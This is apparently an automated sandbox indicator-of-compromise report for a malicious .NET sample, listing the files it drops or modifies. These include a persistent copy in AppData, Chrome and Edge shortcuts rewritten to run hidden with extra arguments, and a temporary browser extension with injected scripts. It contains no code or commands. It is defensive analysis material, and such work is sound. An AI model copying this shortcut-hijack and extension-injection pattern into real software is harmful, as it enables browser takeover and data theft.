IOC Report
zlONcFaXkc.exe

loading gif

Files

File Path
Type
Category
Malicious
zlONcFaXkc.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
initial sample
 malicious
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x4277bb07, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:16 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 11:10:59 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
modified
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zcezeaqsuhi.exe_2eccf0ba13a86cf1e1a7577debc3c62bd9f527_7718e8e7_69a45190-049e-4ed2-84e1-5c3b9073c72f\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD304.tmp.dmp
Mini DuMP crash report, 16 streams, Tue Apr 23 21:02:19 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBBB.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC29.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC75.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE4B.tmp.txt
data
dropped
C:\Users\Public\Desktop\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:30 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zlONcFaXkc.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\18807df7-e6b8-43eb-a965-3fc8fa8dc593.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\433817b6-fd93-48f6-b0dd-fb2ff4429f1e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5652a66e-b171-4090-a3de-71036d446494.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\e252861a-11ce-4449-a12f-2ffb172b2e3e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-662821CF-1DB0.pma
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-662821EA-1908.pma
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-662821F2-2614.pma
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\00c90de8-88af-422d-ae02-e6ebd102ce0a.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\097fdca7-1191-436a-b8f7-6bd14d31d610.tmp
ASCII text, with very long lines (1597), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1cd88563-5b52-4123-99dd-2461a7c4ca5e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\21f79397-4ad8-4701-b38d-8ebd37a723ad.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3e9c75e7-e58c-4a78-a43f-0ecb34d11b67.tmp
Unicode text, UTF-8 text, with very long lines (17792), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\416c4337-c1e2-4d88-96a5-4463b1912f7a.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5e6c4d37-7ca2-4531-8ca2-a8563be0b4c8.tmp
Unicode text, UTF-8 text, with very long lines (17901), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\78240d07-9199-428b-9e25-9d13cdda077e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7d58b8e6-5bc5-429f-98ab-27355ecc933d.tmp
Unicode text, UTF-8 text, with very long lines (17864), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8110ccec-f0a1-4f85-95f8-9cae8e8d2b32.tmp
Unicode text, UTF-8 text, with very long lines (17945), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8b412ceb-47bc-4674-bd80-5df649b7e404.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log
data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)
ASCII text, with very long lines (1597), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\mhpndkmgbeollhlhekioinkiofjhnfki\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\mhpndkmgbeollhlhekioinkiofjhnfki\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\mhpndkmgbeollhlhekioinkiofjhnfki\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4cdaab27-f2c7-44a6-9b91-027c7968e31b.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\746d4978-54f9-44a5-a112-4e76b4fc789b.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9d44da8e-adec-4a59-9791-d41df16adce1.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF2f6ba.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF3e1e5.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL
SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2daa6.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2db23.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF2f6ca.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a86dd10d-090e-4b67-a5c0-7d49815b7716.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dd30c035-e8b4-4c33-9398-99cd252e6cba.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e2e0c34c-2646-4aaf-b536-042d4583c7f7.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f777b565-fe97-4037-942a-af264455caf6.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2fdce.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF34065.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF395f8.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c11e.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4aff3.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF30e49.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF33e33.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF33559.TMP (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\448db563-8897-4d43-9bb6-e6e878491b63.tmp
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF3e1e5.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL
SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c773cec8-a390-4ac2-940b-ecfe97e5f06d.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\eb4607d5-61c1-44a5-9ec4-8db77909cc13.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json
ASCII text, with very long lines (3951), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b34b224d-4463-4d57-9b4a-d53ff3fe8ace.tmp
Unicode text, UTF-8 text, with very long lines (17147), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2aa5f.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b03b.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b05a.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2d75b.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF300bc.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3103d.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF310ba.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33142.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3bc3c.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e35c.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41f6b.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store_new
data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982
raw G3 (Group 3) FAX, byte-padded
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a684c92d-771d-4399-be58-89944aaec192.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ba00d8e9-3b4a-41f3-bf2c-0126261146b8.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2d56a7a-5247-4fa6-b2ff-828228659820.tmp
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e03b6c29-4b01-4499-a3d6-4ab1f1ab126d.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e89d102b-e524-4ecb-98f5-92b221a08681.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\eace5798-c2fd-4316-b66d-a6d393f45355.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f21f7baa-5f58-4c73-82fe-6f3823c9143a.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\faacf587-6158-4adc-89b1-6f1929d2dfba.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres
data
dropped
C:\Users\user\AppData\Local\Temp\0c49ff99-76fe-4570-a48c-603b5195fb1c.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\Extension\background.js
C source, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\js\content.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\js\injected-script.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\bffb21de-8a7e-40f0-863b-38890faf5c1e.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ca9cbf2c-434f-4137-b1d9-fc2e1b91db60.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\cv_debug.log
JSON data
dropped
C:\Users\user\AppData\Local\Temp\e9cd6829-fbd7-41ae-b906-daeaa5ab9731.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\128.png
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\af\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\am\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ar\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\az\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\be\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\bg\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\bn\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ca\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\cs\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\cy\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\da\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\de\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\el\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en\messages.json
JSON data
dropped
